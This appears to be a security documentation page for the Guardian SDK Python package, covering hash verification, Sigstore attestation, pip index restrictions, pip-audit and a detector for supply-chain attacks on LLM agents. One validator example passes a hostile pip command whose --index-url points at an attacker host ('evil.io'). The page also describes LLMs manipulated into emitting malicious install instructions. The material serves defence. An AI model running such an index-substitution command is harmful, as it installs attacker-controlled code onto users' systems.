This document explains how to verify the integrity of the Guardian SDK package and how to protect your codebase from supply chain / dependency injection attacks.
Before installing, confirm that the wheel hash matches the value published on PyPI.
# Download without installing
pip download ethicore-engine-guardian==2.6.0 --no-deps -d /tmp/guardian-dl
# Compute SHA-256 of the downloaded wheel
pip hash /tmp/guardian-dl/ethicore_engine_guardian-2.6.0-py3-none-any.whlCompare the output against the hashes listed on the PyPI release page.
Add the --require-hashes flag to your pip install to enforce integrity on every dependency:
# requirements.txt
ethicore-engine-guardian==2.6.0 \
--hash=sha256:<paste hash from PyPI here>pip install -r requirements.txt --require-hashesThis ensures pip will refuse to install any version of the package that does not match the expected hash — protecting against typosquatting, index substitution, and man-in-the-middle attacks on the package registry.
Starting with v2.6.0, the Guardian SDK includes a self-integrity CLI command:
# Verify your installed Guardian SDK
guardian verify
# Verbose — show per-file pass/fail
guardian verify --verbose
# Machine-readable output (CI pipelines)
guardian verify --json
# Strict mode — exits 1 if manifest is missing
guardian verify --strictThis checks SHA-256 hashes of all bundled Python and JSON files against the pre-computed baseline manifest shipped inside the wheel. If any file has been tampered with since the wheel was built, the mismatch is reported.
ONNX model files (licensed tier) are independently verified against
model_signatures.json.
Set the environment variable to run integrity verification at package import time:
# Warn on mismatch (recommended for most deployments)
export GUARDIAN_VERIFY_INTEGRITY=1
# Raise RuntimeError on mismatch (security-critical pipelines)
export GUARDIAN_VERIFY_INTEGRITY=strictOr programmatically:
from ethicore_guardian.integrity import verify_sdk_integrity
result = verify_sdk_integrity()
if not result.passed:
raise RuntimeError(f"Guardian SDK integrity check failed: {result.summary}")Guardian SDK wheels are signed using Sigstore via GitHub
Actions on every release. To verify the attestation using the cosign tool:
cosign verify-attestation \
--type slsaprovenance \
--certificate-identity-regexp "https://github.com/OraclesTech/guardian-sdk/.*" \
--certificate-oidc-issuer https://token.actions.githubusercontent.com \
/tmp/guardian-dl/ethicore_engine_guardian-2.6.0-py3-none-any.whlA successful verification confirms the wheel was built by the official CI pipeline and has not been tampered with since signing.
Configure pip to only install from approved sources:
# Allow only PyPI
pip config set global.index-url https://pypi.org/simple/
pip config set global.no-index-url ""Or enforce this in pip.conf / pip.ini for your entire environment.
pip install pip-audit
pip-audit -r requirements.txtGuardian SDK's CI pipeline runs pip-audit automatically on every build. You should
run it in your own CI against your full dependency tree.
The supplyChainDependencyInjection threat category (added in the API tier, v2.6.0)
detects when an LLM is being manipulated into generating malicious package installation
instructions targeting your development workflow. This covers:
- Dependency confusion — attacker uploads a malicious package to PyPI using your private package's name, causing pip to install it instead of your internal version.
- Typosquatting — package name one character off from a trusted dependency.
- Index substitution —
--index-urlflag pointing to an attacker-controlled server. - Backdoored version pinning — model instructed to pin a dependency to a vulnerable or backdoored release.
Enable the check in your agentic pipeline:
from ethicore_guardian import Guardian
guardian = Guardian(api_key="eg-sk-...")
# All tool calls and outputs are automatically scanned, including
# pip/npm install commands generated by the LLM.
protected_client = guardian.wrap(openai.OpenAI())Or use ToolCallValidator directly before executing any package-manager tool:
from ethicore_guardian.analyzers.tool_call_validator import ToolCallValidator
validator = ToolCallValidator()
result = validator.validate("pip_install", {"cmd": "pip install somepackage --index-url http://evil.io"})
if result.verdict == "BLOCK":
raise RuntimeError(f"Blocked malicious tool call: {result.matches[0].description}")Please report security vulnerabilities to:
security@oraclestechnologies.com
Do not file public GitHub issues for security vulnerabilities. We will respond within 48 hours and coordinate a responsible disclosure timeline.
| Protection | Status |
|---|---|
| PyPI package hashes published | ✅ |
| Sigstore / SLSA attestations | ✅ |
Hash-pinned requirements.lock |
✅ |
Continuous pip-audit on wheel builds |
✅ |
| Typosquatting stubs on PyPI | ✅ (4 variants monitored) |
SDK self-integrity check (guardian verify) |
✅ v2.6.0+ |
| AI-mediated supply chain detection | ✅ API tier v2.6.0+ |
Last updated: 2026-05-18 — Guardian SDK v2.6.0